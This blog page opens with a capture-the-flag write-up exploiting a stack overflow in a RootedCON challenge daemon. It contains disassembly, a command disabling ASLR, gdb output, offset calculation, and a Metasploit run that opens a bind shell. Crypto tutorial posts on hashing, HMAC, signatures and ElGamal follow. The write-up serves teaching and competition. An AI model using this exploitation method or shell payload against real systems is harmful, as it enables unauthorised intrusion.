Limited Entropy Dot Com Not so random thoughts on security featured by Eloi Sanfèlix


RootedCON CTF write-up ‘hello’ challenge

Posted by Eloi Sanfèlix

As you probably know, last week I was at RootedCON. During the congress, a Caputre The Flag contest was organized, where each participant had to resolve several challenges.

Although I didn't register for the contest, I got a copy of one of the binaries from a friend of mine. I'm sorry to be too late for it, if I had been on time he would have won a 1000 euro prize... but I had no time due to my talk. Sorry dude!

However, yesterday morning I had some spare time after the other guys left the hotel and during my flight, so I gave it a try. Yesterday during one of the talks I did a preliminary reverse engineering session with IDA Pro and quickly spotted the flaw: as the hints said, it was a stack buffer overflow using sprintf() in the say_something function :

public say_something
say_something proc near
var_118= dword ptr -118h
var_114= dword ptr -114h
var_110= dword ptr -110h
var_106= byte ptr -106h
var_C= dword ptr -0Ch
arg_0= dword ptr  8
push    ebp
mov     ebp, esp
sub     esp, 118h
mov     [esp+118h+var_110], 3E8h
mov     [esp+118h+var_114], 0
mov     [esp+118h+var_118], offset petete
call    _memset
mov     [esp+118h+var_110], 3E8h
mov     [esp+118h+var_114], offset petete
mov     eax, [ebp+arg_0]
mov     [esp+118h+var_118], eax
call    _read
mov     [ebp+var_C], eax
mov     eax, offset aHolaS ; "Hola %s"
mov     [esp+118h+var_110], offset petete
mov     [esp+118h+var_114], eax
lea     eax, [ebp+var_106]
mov     [esp+118h+var_118], eax
call    _sprintf
mov     eax, [ebp+var_C]
add     eax, 5
mov     [esp+118h+var_110], eax
lea     eax, [ebp+var_106]
mov     [esp+118h+var_114], eax
mov     eax, [ebp+arg_0]
mov     [esp+118h+var_118], eax
call    _write
mov     [esp+118h+var_110], 1
mov     [esp+118h+var_114], offset asc_8048F3B ; "\n"
mov     eax, [ebp+arg_0]
mov     [esp+118h+var_118], eax
call    _write
say_something endp

They also provided an address space map from /proc/pid/maps, where one can see that the stack ends at 0xc0000000, which is the default userspace/kernelspace boundary in Linux x86. This means that ASLR is not enabled, so I just disabled it:

# echo 0 > /proc/sys/kernel/randomize_va_space

Then, I tried to exploit it launching the binary from the shell. However, the binary goes through several steps before it reaches the vulnerable code path. First it is 'daemonized': it forks and the parent process exists while the child process continues in the background. Not too bad, you can just attach to the child process with gdb, but this is not the interesting process yet. After it is daemonized, it does something along the lines of the following C code:

    die("could not drop privs");
if((pw_struct = getpwuid(0x837))==NULL)
    die("Could not get pw entry");

And then the process creates a socket and binds it to the tcp port 7878 and listens for incoming connections. Once a connection is received, it forks and serves it in the child process, while the parent process just goes back to the listen loop. This last process is the one we'd like to analyze, since this is the one calling our vulnerable function.

All this means that we'll need to do one of two things to reach this vulnerable code during our analysis: either we create a user with the uid needed or we patch the program to bypass these calls or to ask for a different uid. I took the first approach.

So what I did was connecting with netcat and attaching to the last process before sending any data. Then I sent a 300 byte pattern generated with Metasploit's pattern_create.rb:

$ nc localhost 7878
<Attach to process with gdb>

This is what happens in gdb:

Program received signal SIGSEGV, Segmentation fault.
0x41376941 in ?? ()

Great. It seems we control eip and this definitely looks like part of the metasploit pattern. Let's find which part it is:

$ ./pattern_offset.rb 41376941 300

Allright, we have 261 bytes before we hit eip. This is a weird number, but it's due to the fact that it uses sprintf() with 5 characters in front of our input. Now we can use gdb to find where the buffer starts, and we find it at 0xbffff1c2. So this is our current situation: we can enter 261 bytes of data, then we have eip which we control, and then we have still some more room (up to the 1000 bytes read by the daemon from the network).

So, we'll just fill the buffer with junk, then an address in the middle of our nop sled (such as 0xbffff380), then some nops and then our payload. Since we do not have ASLR or anything, this will just work. We use a nop sled to count for the different environment the CTF server would have: a different list of environment variables will make the stack move slightly up or down.

Now we can make a metasploit module for it, and just launch it:

msf > use exploit/linux/misc/ctf_rooted 
msf exploit(ctf_rooted) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(ctf_rooted) > set encoder x86/countdown
encoder => x86/countdown
msf exploit(ctf_rooted) > exploit
[*] Started bind handler
[*] Command shell session 1 opened ( ->
uid=1000(eloi) gid=1000(eloi) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(eloi)
Abort session 1? [y/N]  y

The metasploit module can be found here. You can see that it is a pretty simple module and it works fine on my local machine. Maybe you need to change something in yours (at the very least, disabling randomize_va_space is required) but it should be very similar or identical.

I did actually fill the buffer with the return address repeated many times because it failed when I was not attached with gdb and wanted to be sure I was overwriting the saved eip. I didn't investigate the reason, just solved it putting the ret address instead of nops and making a slightly bigger nop sled than I had before.

Since it is a remote exploit and the environment may vary greatly from your own machine to the CTF machine, it is possible that some bruteforcing of the return address is needed. Anyway, the daemon continues alive even if your exploit fails, so it should be no problem.

Again, I'm sorry dude I could not help you on time. Anyway, I'm sure you guys had great fun with it!

Filed under: General 3 Comments

RootedCON coming up!

Posted by Eloi Sanfèlix

Yes, it's finally there!

RootedCON will take place the coming week in Madrid, and I'll be there to present together with Javi some stuff about Android on Saturday. You can see our first slide spoiled by Javi on twitter here:

The schedule looks promising and I think we are going to have loads of fun 😀

I'll be there the three days, so if you want to talk to me about anything interesting (info security, side channel analysis, cryptography, whatever...) or have a beer just drop by!

See you there!

Tagged as: 1 Comment

Understanding the DNIe, Part I : Device Authentication

Posted by Eloi Sanfèlix

For a long time I wanted to have the opportunity to analyze the Spanish electronic ID, known in Spain as the DNIe. Last Christmas I was finally able to get an appointment with the appropriate police station in Spain and could get my brand new DNIe. Over a few posts I'm going to tell you how I've been trying to understand what the device does without access to any confidential information whatsoever, using information freely available on the Internet and analyzing communication logs between my PC and my DNIe.

The DNIe is a smart card implementing an E-SIGN application. This application is specified by the CWA-14890 documents (where CWA means CEN Workshop Agreement, and CEN means European Committee for Standardization ) and provides an interoperable framework for secure signature devices.

These devices are designed to be used for electronic signatures, and in the Spanish case it has replaced the identity document we have used for many years. It is an ISO 7816 compliant smart card, with (afaik) a custom operating system. The IC has received an EAL5+ Common Criteria certificate issued by the French scheme, while the ICC has been certified by the Spanish scheme and has obtained EAL4+.

This is all public documentation you can find on the Internet:

These documents show the Common Criteria certificates for the chip and the card, and the specifications of the protocol followed by the card.

Further, the Spanish Administration provides an OpenSC library in binary form, that one can use for communicating with the cards in Linux an Mac OS X. They also provide a CSP for Microsoft Windows. In the remainder of this post I'll explain my attempts at understanding how the device and the protocol work.

Everything has been done with consumer equipment on an Ubuntu 9.10 computer and using public documentation, thus everyone holding an actual DNIe should be able to reproduce these steps. Let's try to understand the details about this thing and how it communicates with our PC. We will start with the Device Authentication phase, which is the first thing that takes place when you use your eID.

Let me remind once again that I do not have access to any confidential information related to the DNIe, and therefore this is all public information. Also, I've done this analysis on my own free time sitting at home and using publicly available tools and a PCSC reader obtained from Tractis.


Crypto Series – ElGamal Cryptosystem

Posted by Eloi Sanfèlix

In our last post we learnt about the Discrete Lograithm problem, why it is a difficult problem and how we can attempt to solve it if the numbers are manageable. Of course, in a real setting we wouldn't use 16 bit numbers as in my example, but at least 1024 bit numbers nowadays (and most likely even bigger numbers).

Now, we are going to see how to make  use of that problem to create a public key cryptosystem. We will look at how ElGamal uses the DL problem to provide public key encryption and digital signatures. Keep on reading if you are interested!


Crypto Series: Discrete Logarithm

Posted by Eloi Sanfèlix

From last post, it becomes clear that at this stage we won't be able to make it without some maths. That's because we are dealing now with public key crypto, which is based on difficult mathematical problems (as in difficult to solve, not as in difficult to understand).

With symmetric crypto, we could understand the concepts of diffusion and confusion without needing to dive into maths. On the other hand, here we will need to understand the problems on which the algorithms rely in order to understand how they work.

In this post, we'll see what's the Discrete Logarithm problem, why it is difficult to solve based on a simple intuition, and finally a method to solve this kind of problems. Of course it's not the only (nor the best) existing method, but in my opinion it is the simplest one to understand.


Welcome to Limited Entropy Dot Com

Posted by Eloi Sanfèlix

Well, not much to say, this blog is just coming to life now. I've imported everything from my previous blog and posted a note there so that current readers can still follow me. The template used is still a default one, but I asked a friend of mine to apply some small personalization to it whenever she has time, so it will change a little in the future.

If you are new here, take a look at the About page to know a little more about the guy writing these lines. I'll continue talking about security, cryptography and all that weird stuff I like starting today. Stay tuned!

Filed under: General No Comments

Crypto Series: Digital Signatures

Posted by Eloi Sanfèlix

In the previous post, I said I'd write about the Discrete Logarithm problem in the next post. However, I forgot to mention the general idea behind digital signatures. Since I can't sleep right now and have to take a train to the airport in a couple of hours, I decided to go ahead and write a few lines about digital signatures ;-).

Basic idea

The basic idea behind digital signatures is to make use of the fact that in public key cryptography a user has a private key which is never disclosed to anyone in order to authenticate the user or messages generated by that user.

In a symmetric setting, authentication is performed using MAC or HMAC mechanisms, and at least two parties know the key used to generate those messages. Therefore, a given party could deny that he or she generated a given authenticated message, because he is not the only one who knows that key and therefore there is no proof that he did generate the message.

Of course, if only two parties know the key, and one of the parties knows that a particular message was not generated by himself, then it must come from the other party. However, in a legal dispute, there is no way to prove that and to an external observer both of the options are equally likely.

To solve that issue, digital signatures generate a sort of authentication code using a private key, never disclosed to anyone. Then, using the related public key, everyone can verify that signature and therefore be sure that the message came from that user. Since that entity is the only one knowing the private key, this sort of construction can be used to bind a user to a message and resolve any legal disputes that might arise.

Normally, you can see the digital signature generation process as some sort of encryption with a private key. On the other hand, you can imagine the signature verification (or opening) phase as a decryption using the public part of the key.

Practical usage of digital signatures

In real world, documents are usually way larger than the message length that common digital signature algorithms can handle directly. Since authenticating each chunk of a document is not very practical (asymmetric crypto is usually slooooow), in practice a cryptographic hash is computed over the document, and the hash is signed using the private key and the signature algorithm.

Then, in the verification stage, a second hash is computed and compared against the signed hash. If they match, the signature is correct and therefore the received document was created by the signing party and has not been modified.

Of course, this assumes that cryptographic hash functions behave as expected, and there are no collisions. Ohterwise, if one might find another document which produces the same hash (and thus the same signature), any legal proof that the document was created by the private key holder would be destroyed.

Therefore, choosing secure hash functions for usage within digital signatures is a crucial issue. As an example problem that arose due to the use of insecure hash functions with digital certificates, check the Hashclash project.


Crypto Series: New Directions in Cryptography

Posted by Eloi Sanfèlix

As some of you might have noticed already by looking at the title, this post will be the first one talking about public key cryptography.  Today, I'll introduce the basic ideas around public key crypto and the ideas proposed by Diffie and Hellman in their famous paper 'New Directions in Cryptography' from 1976.

In subsequent posts, we well look at the discrete logarithm problem and the factorization problem. We'll also look into some public key cryptosystems, such as El-Gamal and RSA. And after that, we'll look at Elliptic Curve Cryptography. With all this, the algorithms part of this series will be considered closed and I'll move into cryptographic systems and protocols ;-). Stay tuned!


Crypto Series: Authentication codes

Posted by Eloi Sanfèlix

This time we'll treat two well known techniques used to solve a common problem in cryptography: authentication. To put it simple, authentication is the process of establishing an identity or a message's origin.

To achieve this using symmetric cryptography, two basic mechanisms exist. The first of them, commonly referred to as Message Authentication Codes (MAC), is based on using block ciphers with a shared key between the party claiming an identity (or sending a message) and the party verifying the identity or the origin of the message.

The second one, known as Hashed Message Authentication Codes (HMAC) is based on the use of a hash function together with some shared key. In the remaining of this post, I briefly describe the basic idea behind these two ways of assuring message authentication.

Message Authentication Codes using block ciphers

A common way to authenticate messages is to use a block cipher, such as DES, in a mode of operation which makes the latest encrypted block dependent on both the key and all the previous plaintext blocks. For instance, one can think of using 3DES in CBC mode to create a MAC over a message: encrypt the message in CBC mode using 3DES with the shared key, get the last output block and attach it to your original message.

When the recipient gets the message with its MAC, it does the same operation: encrypt each block using CBC mode and takes the last block. The result is compared against the MAC attached to the message: if there is a match, the sender of the message must have known the key (unless the encryption used is broken).

Despite being one of the most popular techniques for MAC generation (if not the most popular), CBC-MAC has some security problems and other techniques exist. For instance, you can take a look at Special Publication 800-38B by NIST.

Hashed Message Authentication Codes

HMAC is a standardized way of using hash functions for authentication purposes. The idea is to incorporate the usage of a key into a hash function, in such a way that the resulting hash could not be produced without knowing the key.

The obvious choices of prefixing the message with the key or appending the key after the message before computing the hash have security problems (see Stop using unsafe keyed hashes, use HMAC by Nate Lawson). Therefore, a slightly more complex structure was invented to avoid such problems.

The HMAC construction is defined as follows:

HMAC(m,K)=H((K \oplus opad)||H((K \oplus ipad)||m))

Where opad (outer pad) is the constant 0x5c...5c and ipad (inner pad) is the constant 0x36...36. These constants, as well as the key, are of the same length as the hash function's block length.

With this, one would follow the same approach as with any MAC: compute the HMAC value for the given message, and send it attached to the message. The recipient will perform the same computation, and if it matches the one attached to the message he will conclude that the message was sent by someone who knows K (which is hopefully only the person/entity he shared it with 😉 ).

This concludes my introduction to authentication codes. If you are looking for a good security analysis on HMAC functions, wait for Nate's post because I'm sure it will be very interesting.


Crypto Series: Cryptographic hash functions – SHA-2

Posted by Eloi Sanfèlix

So far, we've looked at block and stream ciphers in this series, including examples of each of them. Before going into asymmetric crypto I want to explain a little bit about cryptographic hash functions and some of their applications. We'll look at hash functions in general and at the SHA-1 hash function as an example.

Note that I'll often skip the 'cryptographic' adjective throughout this series of posts, but I'll always refer to cryptographic hash functions and not to regular hash functions. And as usual, this is by no means complete but just tries to give a basic understanding of what hash functions are and how they usually look like.

I must say I never studied hash functions too deeply, so this stuff will serve as a reminder for me as well. If something is not as accurate as you'd hope for, let me know in the comments ;-).

Cryptographic Hash functions: properties

A cryptographic hash function is defined as a series of operations over an input message of arbitrary length, producing an output of fixed length (hash or message digest) such that a change to the message would not come unadvertised. It should be easy to compute a hash function from a message, but given a hash value it should be infeasible to find a message that would produce that value. Further, given a message it should be infeasible to find a second message producing the same message digest and as I stated before, it should be infeasible to modify a message without modifying its hash value.

Therefore, the desired properties of a cryptographic hash function are as follows:

  • Preimage resistance: given a hash value h, it should be infeasible to find a message m with h=hash(m). Otherwise the function would be vulnerable to preimage attacks
  • Second preimage resistance: given a message m_1 it should be infeasible to find a second message, m_2 which provides the same message. I.e., given m_1, it should be difficult to find m_2 such that h=hash(m_1) = hash(m_2) . Otherwise, the function is said to be vulnerable to second preimage attacks.
  • Collision resistance: It should be difficult to find two messages with the same message digest. Obviously, given a hash function with output size of n bits, if you try 2^{n}+1 messages, you'll get two of them with the same hash. The theory behnd birthday attacks tells us that for a n bit hash function we'd have to try out about 2^{n/2} inputs to find a collision. That number is called the birthay bound.

Typical structure of a hash function

A hash function typically consists of a compression function which takes blocks of a fixed length as input and produced blocks of a fixed length (the output length of the hash function). Additionally, the output of the previous block is fed back to the input so that the next block depends in all the previous blocks. Otherwise, the hash function would be looking at the last block only 😉

Merkle-Damgard construction

Merkle-Damgard construction

The structure shown is known as the Merkle-Damgård construction, and most popular hash functions are based on this construction. However, alternative structures exist and many of the proposals for the SHA-3 contest are based on different constructions.

The SHA-2 family

Although MD5 and SHA-1 are way more popular, I decided to take a look and describe here the structure of the SHA-2 family of hash functions. The reason for this is that MD5 was broken a while ago, first by dr. Wang's team and later by a group of researchers including dr. Benne de Weger. I already talked about it here, although it's only in Spanish. You can see the hashcalc project's page if you don't read Spanish ;-).

Further, SHA-1 is very similar to MD5 and the same sort of problems usually apply to it. Therefore, I chose to look at the next family of hash functions, the SHA-2 family. This includes several hash functions with different output lengths: SHA-224, SHA-256, SHA-384, and SHA-512 where the number defines the number of output bits.

SHA-256 and SHA-512 use 32 and 64 bit words respectively, while SHA-224 and SHA-384 are just truncated versions of them. In the remaining of this section I'll explain SHA-256 since SHA-512's structure is basically the same but with different word size and initial values.

Bascially, the input message is divided in 512 bit blocks M_i , and is padded with additional information that includes the length of the original message. Then, for each of these blocks a message schedule is run which produces 64 variables W_t .

These 64 variables are processed with the compression function shown in this picture, where variables a..f are initialized according to the standard:

SHA-2 Compression function

SHA-2 Compression function

After this processing, the intermediate hash value is computed as the addition (modulo 32) of the variables a..f and the previous intermediate hash value. This process is run for each message block and finally yields the message digest.

Of course, this is a very high level description of the algorithm. If you want to know the details, see the FIPS 180-2 standard publication.

The SHA-3 contest

Currently, an open contest is being held by the NIST to create a new hashing standard, SHA-3. Currently, the contest is in its second round and there are 14 second round candidates. The Second SHA-3 Candidate Conference is planned for August 2010 and the idea is to publish a revised Hash Function Standard by 2012.

More information on the contest and the submissions can be found in the NIST Hash competition website.